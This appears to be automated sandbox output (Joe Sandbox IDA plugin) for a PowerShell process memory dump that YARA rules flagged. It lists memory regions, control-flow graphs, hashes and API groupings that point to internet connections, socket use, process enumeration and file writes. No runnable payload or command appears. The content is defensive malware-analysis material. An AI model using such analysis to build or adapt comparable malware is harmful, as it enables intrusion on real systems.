                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06e884aaf3d97097a663324459028e3f526586813836ae09a6dd5142c9fc9510
                                                                                        • Instruction ID: d51e5b6d5fe40446a9715214c84f88b3d956206d72d8c5078b6c81c35c5c4b7a
                                                                                        • Opcode Fuzzy Hash: 06e884aaf3d97097a663324459028e3f526586813836ae09a6dd5142c9fc9510
                                                                                        • Instruction Fuzzy Hash: 21F1A2A2A0D7C65FE7578B2888B55A57FF0EF5322070941EBC189CB1E3DA1D6C06C792

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$Option$ConnectOpenRevertSelf
                                                                                        • String ID:
                                                                                        • API String ID: 1513466045-0
                                                                                        • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                                                        • Instruction ID: ebe3f4352ce5569d617b83ef5ce276f7e9b6a31cd85e7b94fe7e5ffffd47d16f
                                                                                        • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                                                        • Instruction Fuzzy Hash: E241D03D302B80C2EB24DB19E4957D96361F3A7748F080126DA1A577A6DF3CC40A8702

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: IoctlSocketStartupclosesocket
                                                                                        • String ID:
                                                                                        • API String ID: 365704328-0
                                                                                        • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                                                        • Instruction ID: f2b983abc77b00beb9c0339d057dfb2692e935e02e87f22a5437d0d7aadaabb6
                                                                                        • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                                                        • Instruction Fuzzy Hash: AA21E77A70578082E720DF18F64479AB794F3AA7E8F984625DFAD03B95DB3CC5098B01

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CleanupStartup
                                                                                        • String ID:
                                                                                        • API String ID: 915672949-0
                                                                                        • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                                                        • Instruction ID: 0ba490608e2d60dee1d23fb0be4ff1db6e29309ee2df398c27b42627ab3bc506
                                                                                        • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                                                        • Instruction Fuzzy Hash: 9511183C703A41C6FB24EB6CE9593E422A6A763305F88013997154A3D3DE7E454DC712

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                                                        • Instruction ID: c67db27c5cd87c4109928d8cabb03038788349c1d121640aaaeb9b510567524c
                                                                                        • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                                                        • Instruction Fuzzy Hash: A7719636319B8486CAA0CB0AE49035AB7A0F7C9B94F548525EFCE83B68DF3DD455CB00

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0546cfe1981ca72da3e19f31d6c388abfd7678fd10076ac8ecdf546ffd1f99b6
                                                                                        • Instruction ID: bda51c0626edd9ac01f21c042897a84bff9bb95500acdfe48eab9e57f69a445c
                                                                                        • Opcode Fuzzy Hash: 0546cfe1981ca72da3e19f31d6c388abfd7678fd10076ac8ecdf546ffd1f99b6
                                                                                        • Instruction Fuzzy Hash: DC41D57161CB098FD758DE0CC4D59B6B3E1FBA9350B10057DE48AC7696DA26FC41CB81

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 7ffd34794045-7ffd34794056 263 7ffd34794058-7ffd34794059 262->263 264 7ffd3479405c-7ffd3479408c 262->264 263->264 266 7ffd34794091-7ffd347940aa 264->266
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                        • Instruction ID: 40e2684704bb1307ed0675c10ce80ac1e6e70e2e0328b6af30220f6e5a8511aa
                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                        • Instruction Fuzzy Hash: D201677121CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651D636E881CB45

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 298 7ffd347992df-7ffd347992e4 300 7ffd347992b7-7ffd347992de 298->300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5547131d4f7ec8804c6aae26a5359e00412f1e52a986eb3d6db6d2b6b57fc48d
                                                                                        • Instruction ID: ee062852776b8a7d2a45155e575aa18602d119be89053bd4e72607dd44115457
                                                                                        • Opcode Fuzzy Hash: 5547131d4f7ec8804c6aae26a5359e00412f1e52a986eb3d6db6d2b6b57fc48d
                                                                                        • Instruction Fuzzy Hash: 8CF0547271CB458FDB5CDA1CF4519B973D1EB95334F10062EF08BC2696DA26E8428745

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 302 7ffd34861d6f-7ffd34861d9d 305 7ffd34861da2-7ffd34861db2 302->305
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4604831158.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd34860000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ded8c451ef0cc1d614cca78380e0caadf9cd18c14a1408221a0d046da7c9866
                                                                                        • Instruction ID: 53f8f5a8f986a7bb5af0b5bab487b543d9f0c5805c7bc93e1c9884d885b804f5
                                                                                        • Opcode Fuzzy Hash: 6ded8c451ef0cc1d614cca78380e0caadf9cd18c14a1408221a0d046da7c9866
                                                                                        • Instruction Fuzzy Hash: 07F06562749C455FDFC5EF1C98E9AA137C5EF6A71071400A9E18EC72A3DE68EC44C781

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 538 1a6ed356514-1a6ed35655c call 1a6ed350ac0 541 1a6ed356565-1a6ed356568 538->541 542 1a6ed35655e-1a6ed356560 538->542 544 1a6ed35656a-1a6ed356584 call 1a6ed351ca8 call 1a6ed351d18 call 1a6ed352340 541->544 545 1a6ed356589-1a6ed3565bb 541->545 543 1a6ed356c26-1a6ed356c4f call 1a6ed357e20 542->543 544->543 546 1a6ed3565bd-1a6ed3565c4 545->546 547 1a6ed3565c6-1a6ed3565cc 545->547 546->544 546->547 550 1a6ed3565db-1a6ed3565e4 call 1a6ed3599bc 547->550 551 1a6ed3565ce-1a6ed3565d6 call 1a6ed357cec 547->551 559 1a6ed3565ea-1a6ed3565fb 550->559 560 1a6ed3568a6-1a6ed3568b7 550->560 551->550 559->560 562 1a6ed356601-1a6ed356635 call 1a6ed355844 call 1a6ed362408 559->562 563 1a6ed3568bd-1a6ed3568c9 560->563 564 1a6ed356b88-1a6ed356ba4 WriteFile 560->564 562->560 599 1a6ed35663b-1a6ed35663d 562->599 569 1a6ed356997-1a6ed35699b 563->569 570 1a6ed3568cf-1a6ed3568d2 563->570 567 1a6ed356ba6-1a6ed356bac 564->567 568 1a6ed356bae-1a6ed356bb4 call 1a6ed362328 564->568 576 1a6ed356bb6-1a6ed356bb8 567->576 568->576 574 1a6ed356a76-1a6ed356a79 569->574 575 1a6ed3569a1-1a6ed3569a4 569->575 571 1a6ed356be6-1a6ed356bfc 570->571 572 1a6ed3568d8 570->572 584 1a6ed356c08-1a6ed356c18 call 1a6ed351d18 call 1a6ed351ca8 571->584 585 1a6ed356bfe-1a6ed356c02 571->585 580 1a6ed3568db-1a6ed3568e6 572->580 574->571 581 1a6ed356a7f 574->581 575->571 583 1a6ed3569aa 575->583 578 1a6ed356bba-1a6ed356bbc 576->578 579 1a6ed356c20-1a6ed356c24 576->579 578->571 587 1a6ed356bbe-1a6ed356bc1 578->587 579->543 588 1a6ed3568e8-1a6ed3568f1 580->588 589 1a6ed356a85-1a6ed356a8a 581->589 591 1a6ed3569af-1a6ed3569ba 583->591 584->579 585->542 585->584 594 1a6ed356bda-1a6ed356be1 call 1a6ed351cc8 587->594 595 1a6ed356bc3-1a6ed356bd3 call 1a6ed351d18 call 1a6ed351ca8 587->595 596 1a6ed356919-1a6ed35695c WriteFile 588->596 597 1a6ed3568f3-1a6ed3568fc 588->597 598 1a6ed356a8c-1a6ed356a95 589->598 600 1a6ed3569bc-1a6ed3569c5 591->600 594->571 595->594 596->568 605 1a6ed356962-1a6ed356978 596->605 603 1a6ed356908-1a6ed356917 597->603 604 1a6ed3568fe-1a6ed356905 597->604 607 1a6ed356a97-1a6ed356aa4 598->607 608 1a6ed356ac6-1a6ed356b0f call 1a6ed362418 598->608 609 1a6ed356648-1a6ed35665c call 1a6ed362410 599->609 610 1a6ed35663f-1a6ed356642 599->610 611 1a6ed3569c7-1a6ed3569d4 600->611 612 1a6ed3569f8-1a6ed356a3b WriteFile 600->612 603->588 603->596 604->603 605->576 619 1a6ed35697e-1a6ed35698c 605->619 621 1a6ed356aa6-1a6ed356aae 607->621 622 1a6ed356ab2-1a6ed356ac4 607->622 608->568 629 1a6ed356b15 608->629 630 1a6ed35689d-1a6ed3568a1 609->630 631 1a6ed356662-1a6ed356665 609->631 610->560 610->609 613 1a6ed3569d6-1a6ed3569e0 611->613 614 1a6ed3569e4-1a6ed3569f6 611->614 612->568 617 1a6ed356a41-1a6ed356a57 612->617 613->614 614->600 614->612 617->576 625 1a6ed356a5d-1a6ed356a6b 617->625 619->580 627 1a6ed356992 619->627 621->622 622->598 622->608 625->591 632 1a6ed356a71 625->632 627->576 634 1a6ed356b17-1a6ed356b51 WriteFile 629->634 630->578 635 1a6ed35666b-1a6ed35668a 631->635 636 1a6ed3567ef-1a6ed3567f4 631->636 632->576 637 1a6ed356b53-1a6ed356b5d 634->637 638 1a6ed356b61-1a6ed356b69 call 1a6ed362328 634->638 639 1a6ed3566ac-1a6ed3566b6 call 1a6ed358738 635->639 640 1a6ed35668c-1a6ed3566aa 635->640 641 1a6ed3567f6-1a6ed356812 636->641 642 1a6ed356814 636->642 637->634 643 1a6ed356b5f 637->643 649 1a6ed356b6d-1a6ed356b6f 638->649 658 1a6ed3566ec-1a6ed3566f2 639->658 659 1a6ed3566b8-1a6ed3566c5 639->659 645 1a6ed3566f5-1a6ed356702 call 1a6ed35adec 640->645 647 1a6ed356819-1a6ed35681e 641->647 642->647 643->649 661 1a6ed356708-1a6ed356745 call 1a6ed362418 645->661 662 1a6ed356894-1a6ed356898 645->662 652 1a6ed35685f 647->652 653 1a6ed356820-1a6ed35682f call 1a6ed35adf4 647->653 649->576 656 1a6ed356b71-1a6ed356b80 649->656 657 1a6ed356864-1a6ed35686c 652->657 653->568 667 1a6ed356835-1a6ed35683b 653->667 656->589 663 1a6ed356b86 656->663 657->662 664 1a6ed35686e 657->664 658->645 665 1a6ed3566cb-1a6ed3566e1 call 1a6ed35adec 659->665 666 1a6ed356873-1a6ed35688b 659->666 661->662 674 1a6ed35674b-1a6ed35677a WriteFile 661->674 662->576 663->576 664->631 665->662 675 1a6ed3566e7-1a6ed3566ea 665->675 666->662 667->652 670 1a6ed35683d-1a6ed356853 call 1a6ed35adf4 667->670 670->568 678 1a6ed356859-1a6ed35685b 670->678 674->568 677 1a6ed356780-1a6ed35678e 674->677 675->661 677->662 679 1a6ed356794-1a6ed35679e 677->679 678->652 679->657 680 1a6ed3567a4-1a6ed3567d6 WriteFile 679->680 680->568 681 1a6ed3567dc-1a6ed3567e1 680->681 681->662 682 1a6ed3567e7-1a6ed3567ed 681->682 682->657
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                        • String ID: U
                                                                                        • API String ID: 3902385426-4171548499
                                                                                        • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                                                        • Instruction ID: f97b65545f81ee47061bf914def049f6f68c10a95293f7c507e6df85804d4eab
                                                                                        • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                                                        • Instruction Fuzzy Hash: 0012047A316641C6EB20CF2DD4843EE77A1F7A7748F680116EA8943795DB3DC889CB12
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                                                                        • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                                                        • API String ID: 718051232-1833344708
                                                                                        • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                                                        • Instruction ID: 00e1c4fa36c90a1e7589fd928561207c8cfefd7c240df4531d0630b0bec34fd0
                                                                                        • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                                                        • Instruction Fuzzy Hash: A882B43DB07640C2FA68DB2E98543E912D0A7A7780F9C4126D90A47BD5DE3EC98F8743
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                        • String ID: $@
                                                                                        • API String ID: 3318157856-1077428164
                                                                                        • Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                                                        • Instruction ID: d4c5a2499e9abbe9645f5841ac1b9af2918b3592a48f3f2882ea389dd6a243a5
                                                                                        • Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
                                                                                        • Instruction Fuzzy Hash: 1652DEBA70A684C6FB65CB1DD5443FEABA0B763794F1C1115DE4647AE4DB38C848CB02
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                        • String ID:
                                                                                        • API String ID: 3318157856-3916222277
                                                                                        • Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                                                        • Instruction ID: cfaeff35a83205aeff76f4345130696f74028edf28b73ded92e9751b7ff075ea
                                                                                        • Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
                                                                                        • Instruction Fuzzy Hash: C152DE3E70A684C6FB75CB9DD6443EE6BA0B763784F2C0005DE4616AD5DB79C848CB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                        • String ID: $@
                                                                                        • API String ID: 3318157856-1077428164
                                                                                        • Opcode ID: 4a38c0d1bf29713d97454c66998f6f1c8deab35124594071882b000f93717dbb
                                                                                        • Instruction ID: f75a53be80497d6170c5a98b284772b1b9ccec8909b51d17e677f853dc630dec
                                                                                        • Opcode Fuzzy Hash: 4a38c0d1bf29713d97454c66998f6f1c8deab35124594071882b000f93717dbb
                                                                                        • Instruction Fuzzy Hash: 9952D03E70A694CAFB75CA1D96443EE6BA4B7677C4F2C0005DA4607AD5FB78C848CB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                                                        • String ID: -$0
                                                                                        • API String ID: 3246410048-417717675
                                                                                        • Opcode ID: b24723a82e80602d9e360efdf77550aa3bb04d5b03f0ab6de1a502a8a2fed25a
                                                                                        • Instruction ID: 01a17cdff8fc01e9f8bc58dc5ed70d3585a2f0a3611bb27d323ce4a2176e6fe3
                                                                                        • Opcode Fuzzy Hash: b24723a82e80602d9e360efdf77550aa3bb04d5b03f0ab6de1a502a8a2fed25a
                                                                                        • Instruction Fuzzy Hash: 8242E17E70A684C6FB78CB5D96403FE6BA4B7677C4F1C0105DA4686AD6E738C848CB42
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                        • String ID: U
                                                                                        • API String ID: 3902385426-4171548499
                                                                                        • Opcode ID: 5c9e67efb867bf0e13aa39ce989e8adbf2eb3d39c19cdce2a19d0d9c61058b81
                                                                                        • Instruction ID: 6f63749cdf5ffc44ab02980e079d6fa513343eff15439b803aefff4cf202e714
                                                                                        • Opcode Fuzzy Hash: 5c9e67efb867bf0e13aa39ce989e8adbf2eb3d39c19cdce2a19d0d9c61058b81
                                                                                        • Instruction Fuzzy Hash: C112E43A316641C6EB20CF2CD4843DEB7A1F7A7794F584216EA8943A95EB3DC44DCB12
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                                        • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                                                        • API String ID: 3442832105-1222817042
                                                                                        • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                                                        • Instruction ID: fe103d8d6c5b670ad9119a3cd1218443bc839687b5b87d80bd6c7cb81221a173
                                                                                        • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                                                                                        • Instruction Fuzzy Hash: C74294B9715E84D2EA25CB2DD0012E9A3A0FFA7799F085101DF8817B65EB3DD1ABC341
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
